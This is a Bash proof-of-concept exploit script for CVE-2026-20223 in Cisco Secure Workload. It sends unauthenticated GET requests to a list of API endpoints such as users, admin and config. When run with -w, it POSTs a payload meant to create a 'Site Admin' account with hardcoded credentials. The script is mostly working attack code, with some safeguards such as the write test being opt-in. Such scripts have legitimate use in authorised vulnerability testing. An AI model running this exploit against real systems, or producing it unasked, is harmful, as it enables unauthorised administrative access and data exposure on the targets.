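#!/bin/bash
# =============================================
# CVE-2026-20223 PoC - Cisco Secure Workload
# Bash Version with Error Handling & Logging
# =============================================
#
# Sends unauthenticated GET requests to a fixed list of API paths on the
# target and reports which of them answer 2xx.  The follow-up POST is a
# write operation against the target, so it only runs when -w is given;
# a default run is read-only.
#
# Usage: -t <url> [-l <logfile>] [-v] [-w]
#
# Operational notes:
#   * curl runs with -k (no TLS verification) so appliances with
#     self-signed certificates can be tested; the connection is therefore
#     not authenticated to the server.
#   * Response previews are appended to the log file when -l is used,
#     so that file may contain data returned by the target; protect it.
#   * Scratch files live in a private mktemp directory rather than fixed
#     names under /tmp, and are removed on every exit path.

set -uo pipefail

TARGET=""
LOGFILE=""
VERBOSE=false
WRITE_TEST=false
SCRATCH_DIR=""

# Per-request timeout (seconds) so an unresponsive host cannot hang the run.
readonly CURL_TIMEOUT=15
readonly USER_AGENT="PoC-CVE-2026-20223"

# Colors for output
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly RESET='\033[0m'

#######################################
# Print a colored, levelled message to stdout and append a plain copy to
# $LOGFILE when one was given.
# Globals:   VERBOSE, LOGFILE, color constants (all read)
# Arguments: $1 - level (INFO|SUCCESS|WARN|ERROR|CRITICAL|DEBUG)
#            $2 - message text
# Outputs:   message on stdout; DEBUG lines only when VERBOSE=true
#######################################
log() {
  local level="$1"
  local message="$2"
  local timestamp
  # Declaration and assignment are split so a failing date is not masked.
  timestamp=$(date '+%Y-%m-%d %H:%M:%S')
  # %b expands the escape sequences in the color constants; the message
  # itself goes through %s so backslashes in it are printed verbatim.
  case "$level" in
    INFO)     printf '%b[INFO]%b %s\n' "$BLUE" "$RESET" "$message" ;;
    SUCCESS)  printf '%b[+]%b %s\n' "$GREEN" "$RESET" "$message" ;;
    WARN)     printf '%b[!]%b %s\n' "$YELLOW" "$RESET" "$message" ;;
    ERROR)    printf '%b[ERROR]%b %s\n' "$RED" "$RESET" "$message" ;;
    CRITICAL) printf '%b[CRITICAL]%b %s\n' "$RED" "$RESET" "$message" ;;
    DEBUG)
      if [[ "$VERBOSE" == true ]]; then
        printf '%b[DEBUG]%b %s\n' "$CYAN" "$RESET" "$message"
      fi
      ;;
  esac
  if [[ -n "$LOGFILE" ]]; then
    printf '[%s] [%s] %s\n' "$timestamp" "$level" "$message" >> "$LOGFILE"
  fi
}

#######################################
# Print usage to stderr and exit with status 1.
#######################################
usage() {
  printf 'Usage: %s -t <url> [-l <logfile>] [-v] [-w]\n' "$0" >&2
  printf 'Example: %s -t https://secure-workload.example.com -l test.log -v\n' "$0" >&2
  printf '  -w  also send the POST test (write operation against the target)\n' >&2
  exit 1
}

#######################################
# Remove the scratch directory; installed as the EXIT trap.
# Globals:   SCRATCH_DIR (read)
#######################################
cleanup() {
  if [[ -n "$SCRATCH_DIR" ]]; then
    rm -rf -- "$SCRATCH_DIR"
  fi
}

#######################################
# Issue one request and print the HTTP status code curl reports
# (000 when no connection could be made).
# Globals:   CURL_TIMEOUT, USER_AGENT (read)
# Arguments: $1 - HTTP method (GET or POST)
#            $2 - URL
#            $3 - file that receives the response body
#            $4 - request body (POST only; optional)
# Outputs:   three-digit status code on stdout
#######################################
do_request() {
  local method="$1"
  local url="$2"
  local body_file="$3"
  local data="${4-}"
  local -a args=(
    -s -k
    --max-time "$CURL_TIMEOUT"
    -w '%{http_code}'
    -o "$body_file"
    -H "User-Agent: $USER_AGENT"
  )
  if [[ "$method" == POST ]]; then
    args+=(-H 'Content-Type: application/json' -d "$data")
  fi
  local out
  out=$(curl "${args[@]}" "$url" 2>/dev/null)
  # With -o sending the body to a file, %{http_code} is the last three
  # characters of what curl writes to stdout.
  printf '%s\n' "${out: -3}"
}

#######################################
# Return 0 when $1 is one of the GET status codes the PoC counts as
# unauthenticated access (200, 201, 204).
#######################################
is_open() {
  case "$1" in
    200|201|204) return 0 ;;
    *) return 1 ;;
  esac
}

#######################################
# Parse options, probe each endpoint, print a summary.
# Globals:   TARGET, LOGFILE, VERBOSE, WRITE_TEST, SCRATCH_DIR (written)
# Arguments: command-line options (see usage)
#######################################
main() {
  local opt
  while getopts "t:l:vw" opt; do
    case "$opt" in
      t) TARGET="$OPTARG" ;;
      l) LOGFILE="$OPTARG" ;;
      v) VERBOSE=true ;;
      w) WRITE_TEST=true ;;
      *) usage ;;
    esac
  done

  if [[ -z "$TARGET" ]]; then
    log ERROR "Target URL is required (-t)"
    usage
  fi

  # Ensure target has protocol
  if [[ ! "$TARGET" =~ ^https?:// ]]; then
    TARGET="https://$TARGET"
  fi
  TARGET="${TARGET%/}"  # Remove trailing slash

  # Private scratch directory: a fixed /tmp name could be pre-created or
  # symlinked by another local user before the script writes to it.
  SCRATCH_DIR=$(mktemp -d) || { log ERROR "mktemp failed"; exit 1; }
  trap cleanup EXIT
  local get_body="$SCRATCH_DIR/response.txt"
  local post_body="$SCRATCH_DIR/post.txt"

  log INFO "Starting CVE-2026-20223 PoC against: $TARGET"
  log INFO "Test started at: $(date)"
  if [[ -n "$LOGFILE" ]]; then
    log INFO "Logging to file: $LOGFILE"
  fi
  if [[ "$WRITE_TEST" != true ]]; then
    log INFO "Read-only run: POST test skipped (use -w to enable)"
  fi

  local -a endpoints=(
    "/api/v1/users"
    "/api/v1/roles"
    "/api/v1/sites"
    "/api/v1/admin/users"
    "/api/v1/internal/agents"
    "/api/v1/scopes"
    "/api/v1/policies"
    "/api/v1/system/info"
    "/api/v1/config"
  )

  local vuln_count=0
  local endpoint url status_code content preview payload post_status
  for endpoint in "${endpoints[@]}"; do
    url="${TARGET}${endpoint}"
    log DEBUG "Testing GET $endpoint"
    status_code=$(do_request GET "$url" "$get_body")
    # The body file is absent when curl never connected; treat as empty.
    content=$(cat -- "$get_body" 2>/dev/null)

    case "$status_code" in
      200|201|204)
        log WARN "✅ VULNERABLE: $endpoint → $status_code"
        vuln_count=$((vuln_count + 1))
        # Only short bodies are previewed, and only the first 250 chars.
        if (( ${#content} < 800 )); then
          preview=$(printf '%s\n' "$content" | tr '\n' ' ' | cut -c1-250)
          log INFO " Preview: $preview..."
        fi
        ;;
      401) log INFO "🔒 $endpoint requires authentication (likely patched)" ;;
      403) log INFO "🚫 $endpoint → Forbidden" ;;
      000) log ERROR "❌ Connection failed to $endpoint" ;;
      *)   log INFO "$endpoint → $status_code" ;;
    esac

    # Test POST if GET was successful.  This is a write against the
    # target and a 2xx on GET also fires for read-only paths, so it is
    # opt-in (-w) rather than automatic.
    if [[ "$WRITE_TEST" == true ]] && is_open "$status_code"; then
      log DEBUG "Testing POST on $endpoint"
      payload='{"username":"poc_cve202620223","password":"PocPass123!@#","role":"Site Admin","email":"poc@testing.local"}'
      post_status=$(do_request POST "$url" "$post_body" "$payload")
      if [[ "$post_status" == 200 || "$post_status" == 201 ]]; then
        log CRITICAL "🎯 SUCCESS: Created Site Admin via unauthenticated POST on $endpoint!"
      else
        log INFO "POST $endpoint → $post_status"
      fi
    fi
  done

  printf '\n'
  if (( vuln_count > 0 )); then
    log CRITICAL "🚨 TARGET IS VULNERABLE! $vuln_count endpoint(s) exposed without authentication."
  else
    log SUCCESS "No obvious unauthenticated access detected."
  fi
  log INFO "Test completed at: $(date)"
}

main "$@"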